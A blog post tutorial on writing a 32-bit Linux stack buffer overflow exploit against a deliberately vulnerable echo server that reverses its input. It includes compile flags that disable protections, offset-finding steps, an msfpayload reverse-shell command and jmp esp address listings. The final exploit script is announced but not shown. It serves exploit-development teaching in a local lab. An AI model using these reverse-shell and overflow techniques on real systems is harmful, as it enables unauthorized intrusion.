Samiux's Blog

Open Source is a great idea and it has changed the world! Open Source forever ....

While you do not know attack, how can you know about defense? (未知攻,焉知防?)

Do BAD things .... for the RIGHT reasons -- OWASP ZAP

It is easier to port a shell than a shell script. -- Larry Wall

Most of you are familiar with the virtues of a programmer. There are three, of course: laziness, impatience, and hubris. -- Larry Wall

为天地立心，为生民立命，为往圣继绝学，为万世开太平。 -- 王炜

Friday, December 28, 2012

EXPLOIT-DEV : Simple Buffer Overflow exploit writing on Linux

I am going to do a simple buffer overflow on 32-bit Linux. The target application software is namely vuln-server which you can download here.

Why I use this software? It is because this echo server is acting difference to normal echo server. It will echo back the message in reverse order.

Does it matter? Yes, it does matter when you are developing the exploit. The shellcode should be reversed and the return address should not be reversed. It is quite difference to the normal exploit writing.

I develop this exploit under BackTrack 5r3 (32-bit). Let's compile this echo server with gcc with the following switches in order to disable the stack protection.

gcc vuln-server.c -o vuln-server -static -fno-stack-protector -z norelro -ggdb

Run the vuln-server :

./vuln-server 5700

Open another terminal to run the client :

nc -vv 127.0.0.1 5700
Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit

Enter something on the client, for example :

Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit
hello world
dlrow olleh

You will find out that the message you entered is echo back in reverse order.

The server side will display :

127.0.0.1:41959 hello world

Now, write a python script to send 500 bytes of data to the echo server.

Run it and you will find out that the EIP register is overwritten by A's.

Go to create a 500 unique characters to overwrite the EIP.

./pattern_create.rb 500

Copy the result to the captioned python script and replace the junk with the pattern.

Run the python the modified python script again and you will find out that the EIP is overwritten with 0x416c3341.

Reverse the address and find the offset with the following command :

./pattern_offset.rb 0x41336c41 500
[*] Exact match at offset 339

So, the offset is 339.

Now, to create the shellcode with msfpayload and encoded with alpha_upper encoder in order to avoid the bad characters.

msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -e x86/alpha_upper

However, we need to reverse the shellcode with the following python script.

shellcode = "blah blah ...."
shellcode = shellcode[::-1]
shellcode.encode("hex")
print shellcode

Then, add back the "\x" to the shellcode on every two characters.

Okay, it is high time to find the return address.

msfelfscan -j esp vuln-server
[vuln-server]
0x08064e49 push esp; ret
0x08064ea7 push esp; ret
0x08065f71 push esp; ret
0x08081949 push esp; ret
0x08085df9 push esp; retn 0x8934
0x080a56e9 push esp; ret
0x080c37ab jmp esp
0x080c388f jmp esp
0x080c38b7 jmp esp
0x080c3c3f jmp esp
0x080c3d17 jmp esp
0x080c3da7 jmp esp
0x080c3db3 jmp esp
0x080c3dd3 jmp esp
0x080c532b jmp esp <----- selected this one

I select the last one as the return address.

As I mentioned, this echo server is acting difference to others. The flow of the exploit is not running forward but backward. The final exploit python script is like that :

Now, run the listener at port 4444 and run the echo server then run the exploit python script. Yeah, we got the shell.

Therefore, never run any program with root.

That's all! See you.